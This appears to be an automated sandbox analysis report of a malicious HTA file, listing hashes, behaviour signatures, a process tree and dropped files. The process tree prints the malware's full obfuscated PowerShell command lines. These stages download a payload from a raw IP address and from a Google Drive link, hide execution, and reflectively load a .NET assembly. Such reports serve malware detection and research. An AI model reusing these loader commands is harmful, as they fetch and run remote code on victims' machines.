Analysis
-
max time kernel
117s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
23-10-2024 06:01
Static task
static1
Behavioral task
behavioral1
Sample
logicalwayofgreatthingswhichcreatedwithgreatwayofgood.hta
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
logicalwayofgreatthingswhichcreatedwithgreatwayofgood.hta
Resource
win10v2004-20241007-en
General
-
Target
logicalwayofgreatthingswhichcreatedwithgreatwayofgood.hta
-
Size
130KB
-
MD5
16e67de00d1302e9720892be8ab6a06c
-
SHA1
8e8ee3df01c4fb6efd9a5289f48b9795c2483063
-
SHA256
4145c6882b855cfbe79cbe9f9359260d503b0733ef6c901a9f62dd273568e662
-
SHA512
fe6d68bc44f8b2243e1f02e77bf4c39c1ddfe4b2c0ccbf2051da7d10641d06b1da5756e1e89806c09cdad06ea9ca4074a18e98416ece919dbdda55e530a19b0a
-
SSDEEP
96:Eam7B6DJU946WJU92EYDF/9MM9/y80636sJU956t7T:Ea2wDJGWJtEYpJqsJtRT
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2692 POWeRShEll.exe 6 2888 powershell.exe 8 2888 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2056 powershell.exe 2888 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2692 POWeRShEll.exe 2548 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 drive.google.com 6 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language POWeRShEll.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2692 POWeRShEll.exe 2548 powershell.exe 2692 POWeRShEll.exe 2692 POWeRShEll.exe 2056 powershell.exe 2888 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2692 POWeRShEll.exe Token: SeDebugPrivilege 2548 powershell.exe Token: SeDebugPrivilege 2056 powershell.exe Token: SeDebugPrivilege 2888 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2644 wrote to memory of 2692 2644 mshta.exe 30 PID 2644 wrote to memory of 2692 2644 mshta.exe 30 PID 2644 wrote to memory of 2692 2644 mshta.exe 30 PID 2644 wrote to memory of 2692 2644 mshta.exe 30 PID 2692 wrote to memory of 2548 2692 POWeRShEll.exe 32 PID 2692 wrote to memory of 2548 2692 POWeRShEll.exe 32 PID 2692 wrote to memory of 2548 2692 POWeRShEll.exe 32 PID 2692 wrote to memory of 2548 2692 POWeRShEll.exe 32 PID 2692 wrote to memory of 3024 2692 POWeRShEll.exe 33 PID 2692 wrote to memory of 3024 2692 POWeRShEll.exe 33 PID 2692 wrote to memory of 3024 2692 POWeRShEll.exe 33 PID 2692 wrote to memory of 3024 2692 POWeRShEll.exe 33 PID 3024 wrote to memory of 796 3024 csc.exe 34 PID 3024 wrote to memory of 796 3024 csc.exe 34 PID 3024 wrote to memory of 796 3024 csc.exe 34 PID 3024 wrote to memory of 796 3024 csc.exe 34 PID 2692 wrote to memory of 2036 2692 POWeRShEll.exe 36 PID 2692 wrote to memory of 2036 2692 POWeRShEll.exe 36 PID 2692 wrote to memory of 2036 2692 POWeRShEll.exe 36 PID 2692 wrote to memory of 2036 2692 POWeRShEll.exe 36 PID 2036 wrote to memory of 2056 2036 WScript.exe 37 PID 2036 wrote to memory of 2056 2036 WScript.exe 37 PID 2036 wrote to memory of 2056 2036 WScript.exe 37 PID 2036 wrote to memory of 2056 2036 WScript.exe 37 PID 2056 wrote to memory of 2888 2056 powershell.exe 39 PID 2056 wrote to memory of 2888 2056 powershell.exe 39 PID 2056 wrote to memory of 2888 2056 powershell.exe 39 PID 2056 wrote to memory of 2888 2056 powershell.exe 39
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\logicalwayofgreatthingswhichcreatedwithgreatwayofgood.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\SysWOW64\wInDoWSpOwErSHelL\V1.0\POWeRShEll.exe"C:\Windows\sYSTEM32\wInDoWSpOwErSHelL\V1.0\POWeRShEll.exe" "poWERSheLl.exE -EX bYpasS -NOp -w 1 -C DEvIcEcreDeNtIalDepLOymEnT ; IEX($(Iex('[sySTEM.tEXT.EnCODIng]'+[Char]0X3A+[cHAR]58+'utF8.geTsTRINg([SYStem.coNverT]'+[char]0X3A+[Char]0X3A+'FrombaSE64sTRInG('+[char]34+'JDYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQkVyZGVmSW5JVGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZU9odnlRR28sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBabnF2ekZSdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF3QnJheXl5LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBycEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1QlMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRldOQnIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYWxBbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzQzL25ld3RoaW5nc3dpdGhncmVhdGZ0dXJ1ZXdpdGhncmVhdGRheXdlbGxiZXR0ZXJmb3JtZS50SUYiLCIkZU5WOkFQUERBVEFcbmV3dGhpbmdzd2l0aGdyZWF0ZnR1cnVld2l0aGdyZWF0ZGF5d2VsbC52YnMiLDAsMCk7c3RBclQtU0xlZXAoMyk7c3RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcbmV3dGhpbmdzd2l0aGdyZWF0ZnR1cnVld2l0aGdyZWF0ZGF5d2VsbC52YnMi'+[chAr]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpasS -NOp -w 1 -C DEvIcEcreDeNtIalDepLOymEnT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2548
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fn37zcet.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFB7F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFB7E.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:796
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\newthingswithgreatfturuewithgreatdaywell.vbs"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpjb01TUEVDWzQsMTUsMjVdLWpPaW4nJykoKCgnZ1VkaW1hZ2VVcmwgPSBHNUlodHRwczovL2RyaXZlLmcnKydvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkonKydKdjFGNnZTNHNVT3libkgtc0QnKyd2VWhCWXd1ciBHNUk7Z1Vkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVuJysndDtnVWRpbWEnKydnZUJ5dGVzID0gZ1Vkd2ViQ2xpZScrJ250LkRvd25sb2FkRGF0YShnVWRpbWFnZVVybCk7Z1VkaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoZycrJ1VkaW1hZ2VCeXRlcyk7Z1Vkc3RhcnRGbGFnID0gRzVJPDxCQVNFNjRfU1RBUlQ+Pkc1STtnVWRlbmRGbGFnID0gRzVJPDxCQVNFNjRfRU5EPj5HNUk7Z1Vkc3RhcnRJbmRleCA9IGdVZGltYWdlVGV4dC5JbmRleE9mKGdVZHN0YXJ0RmxhZyk7Z1VkZW5kSW5kZXggPSBnVWRpJysnbWFnZVRleHQuSW5kZXhPZihnVWRlbmRGbGFnKTtnVWRzdGFydEluZGV4IC1nZSAwIC1hbmQgZycrJ1UnKydkZW5kSW5kZXggLWd0IGdVZHN0YXJ0SW5kJysnZXg7Z1Vkc3QnKydhcnRJbmRleCArPSBnVWQnKydzdGFydEZsYWcuTGVuZ3RoO2dVZGJhc2U2NCcrJ0xlbmd0aCA9IGdVZGVuZEluZGV4IC0gZ1VkJysnc3RhcnRJbmRleDtnVWRiYXNlNjRDb21tYScrJ25kID0gZ1VkJysnaW1hZ2VUZXh0LlN1YnN0cmluZycrJyhnVWRzdGFyJysndEluZGV4LCAnKydnVWRiYXNlNjRMZW5ndGgpO2dVZGJhc2U2NFJldmVyc2VkICcrJz0gLWpvaW4gKGdVZGJhc2U2NENvbW1hbmQuJysnVG9DaGFyQXJyYXkoKSBXQlggRm9yRWFjaC1PYmplY3QgeyBnVWRfIH0pWy0xLi4tKGdVZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07Z1VkY29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhnVWRiYXNlNjRSZXZlcnNlZCcrJyk7Z1VkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMJysnb2FkKGdVZGNvbW1hbmRCeXRlcyk7Z1VkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChHNScrJ0lWQUlHNScrJ0kpO2dVJysnZHZhaU1ldGhvZC5JbnZva2UoZ1VkbnVsbCwgQChHNUl0eHQuUkZERFJDJysnTC8zNC8xNDEuNjcxLjMuMjkxLy86cHR0aEc1SSwgRzVJZGVzJysnYXRpdmFkb0c1SSwgRzVJZGVzYXRpdmEnKydkb0c1SSwgRzVJZGVzYXRpdmFkb0c1SSwgJysnRzVJQ2FzUG9sRzVJLCBHNUlkZXNhdGl2YWRvRzVJLCBHNUlkZXNhdGl2YWRvRzVJLEc1SWRlc2F0aXZhZG9HNUksRzVJZGVzYXRpdmFkb0c1SSxHNUlkZXNhdGl2JysnYWRvRzVJLEc1SWRlc2F0aXZhZG9HNUksRzVJZGVzYXRpdmFkb0c1SSxHJysnNUkxJysnRzVJLCcrJ0c1SWRlc2F0aXYnKydhZG9HNUkpKTsnKSAtY1JlUExBQ0UgICdHNUknLFtDSGFyXTM5IC1jUmVQTEFDRSdnVWQnLFtDSGFyXTM2LWNSZVBMQUNFICAoW0NIYXJdODcrW0NIYXJdNjYrW0NIYXJdODgpLFtDSGFyXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $EnV:coMSPEC[4,15,25]-jOin'')((('gUdimageUrl = G5Ihttps://drive.g'+'oogle.com/uc?export=download&id=1AIVgJJ'+'Jv1F6vS4sUOybnH-sD'+'vUhBYwur G5I;gUdwebClient = New-Object System.Net.WebClien'+'t;gUdima'+'geBytes = gUdwebClie'+'nt.DownloadData(gUdimageUrl);gUdimageText = [System.Text.Encoding]::UTF8.GetString(g'+'UdimageBytes);gUdstartFlag = G5I<<BASE64_START>>G5I;gUdendFlag = G5I<<BASE64_END>>G5I;gUdstartIndex = gUdimageText.IndexOf(gUdstartFlag);gUdendIndex = gUdi'+'mageText.IndexOf(gUdendFlag);gUdstartIndex -ge 0 -and g'+'U'+'dendIndex -gt gUdstartInd'+'ex;gUdst'+'artIndex += gUd'+'startFlag.Length;gUdbase64'+'Length = gUdendIndex - gUd'+'startIndex;gUdbase64Comma'+'nd = gUd'+'imageText.Substring'+'(gUdstar'+'tIndex, '+'gUdbase64Length);gUdbase64Reversed '+'= -join (gUdbase64Command.'+'ToCharArray() WBX ForEach-Object { gUd_ })[-1..-(gUdbase64Command.Length)];gUdcommandByt'+'es = [System.Convert]::FromBase64String(gUdbase64Reversed'+');gUdloadedAssembly = [System.Reflection.Assembly'+']::L'+'oad(gUdcommandBytes);gUdvaiMethod = [dnlib.IO.Home].GetMethod(G5'+'IVAIG5'+'I);gU'+'dvaiMethod.Invoke(gUdnull, @(G5Itxt.RFDDRC'+'L/34/141.671.3.291//:ptthG5I, G5Ides'+'ativadoG5I, G5Idesativa'+'doG5I, G5IdesativadoG5I, '+'G5ICasPolG5I, G5IdesativadoG5I, G5IdesativadoG5I,G5IdesativadoG5I,G5IdesativadoG5I,G5Idesativ'+'adoG5I,G5IdesativadoG5I,G5IdesativadoG5I,G'+'5I1'+'G5I,'+'G5Idesativ'+'adoG5I));') -cRePLACE 'G5I',[CHar]39 -cRePLACE'gUd',[CHar]36-cRePLACE ([CHar]87+[CHar]66+[CHar]88),[CHar]124))"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2888
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5a07e96bb33a12aa9d272cd6d75ce006e
SHA1ee28d46528aa51cfe07a4d28bd3b5cfae27fcc01
SHA256e96422f584eb2ae13f977c82d7d74a956a0a340b8817233988ba8280e5c9e1f0
SHA5121cf8c06cd03bcf1bbcb984c7b745fe9c69240c22af884f798d821b3dc6573bd0aca9005496276b3c24b62e3a0bcb184e6d7052b8b4004f4fe94abb506d39f591
-
Filesize
3KB
MD5e6e5e0d1576a5f5e093770e6e05b6849
SHA1dcadf615f6c9761b5f48cd93f4477b0300462003
SHA25665bf786c4d99f3cf501002bfad7f6a9e3690580191233554cb01a1d8b55e05f7
SHA512cf880ec7957f8a3dfcfe47cf28d7a3a855b6b467055b5434c9255f78505103af4d07a289c0584f51943d049501a190440b7b02e08f9c62ff670f73b67d962b8f
-
Filesize
7KB
MD54899363f665cb06421bda10424da6855
SHA1b86ea1aa41d9515fa6b03f808024bdc63558ed74
SHA256b4b83ea28a78673d5bf444a7ac17af3aac0b75fde5eda5f89054d8fc3e9087f1
SHA512790a063d162a17713b30bfd0a10a984920601369ab6a780983223717862738443455431b7ecdc5eff58b330a5d9e432d4f7f18b94816019e80f34d4ae53fe882
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5581f4a0c418351c81eb278f1eab0315b
SHA1b28c851702578d78bddb9fb50717b1026f037755
SHA25683da60531d570c549dfa0d792d8d58703001040562d6ae7d9f21ecf14e279e98
SHA512fbefe9b95e2d522a426ce013f3b3f4da23148882cf08195a534a823a33282bc55eedf67fdd9c415f2a65d2c1250f60f5456cefe69a7cdb9b36c540569d36139d
-
Filesize
136KB
MD5655d556c1a60114b9c1df43ca2d1b4e9
SHA1c339a1fb6445b5a5701ef091b328727d2e0cd894
SHA2568895b5c34239ed56abf05b8a381be9153b25baea8167aafceafec196375cd983
SHA5125bcb9c205e7337199e6f7c8e261fe83d1202e6d0aa084648d6d3c00e4c970d47fdbb759494e9c1b9b0347d23d24c4fd561fea17247fec9c81ca3b124b09263ba
-
Filesize
652B
MD54d6447dc7f4408339737a71f748e2a28
SHA12ed10389a8e6977cf4013925ca4c04b5c92bebc0
SHA25649d6d1f7e59de8e03d9f125b170467a559481891a44bd7bc4854bda0a5c089ef
SHA512196c1e1ec501bed198574d00761e8c279d1dce672fae54cdd7e2bddc288d93adf5a19b9ad5342f78481a667ed0fba52de6d43c497de787bd3dc27998650d5d89
-
Filesize
469B
MD5b89fa3ea83594e6aed2a1cbc2ab03515
SHA12457f05ae6c56c192ad5d7c76694e7898ada53f8
SHA256bd9c1570cad7cf95c39fa2a8be51a8851239e7f5cbf0bad032292f733fded0a0
SHA512bf0334f84f3de804f868d3b447eaf98e9d6679b52015ac814cb8d71e2d3fdc90f482bfe5f2801f25a5bef0de53da747028e3d28149ac5fd5ec3cc835ca8c37aa
-
Filesize
309B
MD5f55bfae65f697c4829e40e94a639a245
SHA1e293f5ed3125aa348a82a934449676bf44ee6849
SHA2569cc8a4747d62f72c63f4931dcd9b514a7a94a61f4150210538b1892efc9792da
SHA512539f22638b7a527e877b2b9e35ba15eafd8ba0babfff9bc7558287fb486d930ec5e65afaab2e4e0438484952da96a640bc34f9d82305c2257a5fc6c40f923065